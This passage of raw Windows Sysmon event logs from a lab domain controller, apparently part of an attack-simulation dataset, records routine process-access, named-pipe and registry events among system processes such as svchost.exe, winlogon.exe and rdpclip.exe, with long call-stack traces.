09:21:45.155{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.155{5EBD8912-8D29-6151-8C00-00000000FD01}34082092C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001055455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.155{5EBD8912-8D29-6151-8C00-00000000FD01}34082092C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 18141800x80000000000000001055454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:45.139{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 10341000x80000000000000001055453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x80000000000000001055450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:45.124{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 10341000x80000000000000001055449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CC0-6151-1600-00000000FD01}12961524C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.124{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A111C0A857DFDA56CF16898198ACCD60,SHA256=642F299B1DFD6CD64FB5AD4A6B9ED04A05E09D0068509795CCB337F37FB204C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x80000000000000001055435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-ConnectPipe2021-09-27 09:21:45.077{5EBD8912-8CC0-6151-0F00-00000000FD01}300\TSVCPIPE-8c67a868-d0aa-4910-80f6-79d88af9fa90C:\Windows\System32\svchost.exe 13241300x80000000000000001055434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:21:45.077{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Control Panel\Desktop\MuiCached\MachinePreferredUILanguagesBinary Data 10341000x80000000000000001055433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-8B00-00000000FD01}3668C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.061{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 